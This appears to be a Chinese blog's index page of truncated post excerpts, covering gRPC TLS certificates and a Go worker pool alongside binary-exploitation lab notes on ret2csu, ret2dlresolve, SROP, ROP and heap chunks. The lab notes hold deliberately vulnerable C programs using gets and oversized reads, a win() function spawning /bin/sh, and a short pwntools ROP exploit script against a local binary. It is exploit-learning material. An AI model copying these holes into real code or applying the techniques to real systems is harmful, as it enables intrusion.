什么是grpc？ grpc是google开发的一个Remote Procedure Call (RPC) framework。 生成TLS Certificate 生成ca(Certificate Authority)私钥和自签名证书 openssl req -x509 -newkey rsa:4096 -nodes -days 3650 -keyout ca-key.pem -out ca-cert.pem -subj "/C=TR/ST=ASIA/L=ISTANBUL/O=DEV/OU=TUTORIAL/CN=*.hack.com/emailAddress=hack@foxmail.com" 脚本返回结果： winsun@unbuntu64:~/test/grpc-tls-go/cert$ ./generator.sh [1] 删除所有pem文件 [2] 生成ca私钥和自签名证书 ....+.....+....+..+.+...+..+.............+......... ................................................... ----- winsun@unbuntu64:~/test/grpc-tls-go/cert$ ll total 20 drwxrwxr-x 2 winsun winsun……

worker pool 定义job及channel type WorkerJob struct { from int size int isConcept bool } jobCh := make(chan WorkerJob,100) 定义生产者 生成者负责创建job，并把job投入job channel func producer(jobs chan WorkerJob){ job := WorkerJob{from:1,size:10} jobs <- job } 创建worker pool func worker(jobs chan WorkerJob,results chan WorkerResult ,wg *sync.WaitGroup){ for job := range jobs{ out := WorkerResult{jobId:job.id, message: cosumer(job.from,job.size,job.isConcept)} results <- out } wg.Done() } func createWorkPool(numOfWorkers int,jobs chan WorkerJob,results chan WorkerResult){ var wg sync.WaitGroup for i := 0; i < numOfWorkers ; i++{ wg.Add(1) go worker(jobs,results,&wg) } wg.Wait() close(results) } 定义消费者 func cosumer(from,size int,isConcept bool)string{ //to do... return "success"……

漏洞程序 #include <stdio.h> int win(int x, int y, int z) { if(z == 0xdeadbeefcafed00d) { puts("Awesome work!"); } } int main() { puts("Come on then, ret2csu me"); char input[30]; gets(input); return 0; } 利用分析 常规利用 溢出控制rip指向gadget gadget负责执行win 利用代码： from pwn import * elf = context.binary = ELF('./vuln') p = process() log.info(f'win addr is : {hex(elf.sym.win)}') offset = 40 rop = ROP(elf) rop.raw(offset * 'a') rop.win(0,0,0xdeadbeefcafed00d) p.recv() p.sendline(rop.chain()) result = p.recvline() log.info(result) 上述代码基于一个假设存在可以构建gadget的情况，但实际情……

概要 利用ret2dlresolve，攻击者可以诱导二进制程序解析一个所选择的函数(比如system)为plt。 动态链接的ELF对象在第一次使用PLT和GOT调用时导入libc函数。在重定位runtime symbol，RIP将跳转到PLT并尝试解析该符号。在这个过程中，一个&quo……

socket vuln #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> void vuln(int childfd) { char buffer[30]; read(childfd, buffer, 500); write(childfd, "Thanks!", 8); } void win() { system("/bin/sh"); } ////////////////////// Socket Stuff /* * error - wrapper for perror */ void error(char *msg) { perror(msg); exit(1); } int main(int argc, char **argv) { int parentfd; /* parent socket */ int childfd; /* child socket */ int portno; /* port to listen on */ int clientlen; /* byte size of client's address */ struct sockaddr_in serveraddr; /* server's addr */ struct sockaddr_in clientaddr; /* client addr */ struct hostent *hostp; /* client host info */ char *hostaddrp; /* dotted decimal host addr string */ int optval; /* flag value for setsockopt */ int n; /* message byte size */ /* * check……

SROP Sigreturn Oriented Programming (SROP), a novel technique for exploits and backdoors in UNIX-like systems. 具体见[1]。 漏洞程序 vuln程序 from pwn import * context.arch = 'amd64' context.os = 'linux' elf = ELF.from_assembly( ''' mov rdi, 0; mov rsi, rsp; sub rsi, 8; mov rdx, 500; syscall; ret; pop rax; ret; ''', vma=0x41000 ) elf.save('vuln') └─$ cat /usr/include/asm/unistd_64.h | grep -i sigreturn -A2 #define __NR_rt_sigreturn 15 #define __NR_ioctl 16 #define __NR_pread64 17 嵌入shell地址 ┌──(kali㉿kali)-[~/exploits/srop] └─$ echo -en "/bin/sh\x00" >> vuln ┌──(k……

ROP Returned-oriented Program,defeats the W⊕X protections recently deployed by Microsoft,Intel, and AMD;in this context, it can be seen as a generalization of traditional return-into-libc attacks. But the threat is more general . gadget what gadget Each gadget is an arrangement of words on the stack, both pointers to instruction sequences and immediate data words, that when invoked accomplishes some well-defined task “W⊕X,” ensures that no memory location in a process image is marked both writable (“W”) and executable (“X”) gadget feature One gadget might: perform a load operation another an xor and another a conditional branch 案例程序 from pwn import * context.arch = 'amd64' context.os = 'linux' elf = ELF.from_assembly( ''' mov rdi, 0; mov rsi, rsp; sub rsi, 8; mov rdx,……

chunks 在x86_64上chunk多加16字节的metadata，x86上多加8字节的meatadata metadata := prev size + size + flags(A,M,P) prev size: 前面相邻chunk被free，则代表前chunk大小 size：代表chunk大小 P(0x01): Previous in Use ,表示前面的chunk是否已分配在使用,P == 0,该chunk之前的chun……

引用 CVE-2022-22965……

引用 The Heartbleed Bug, explained……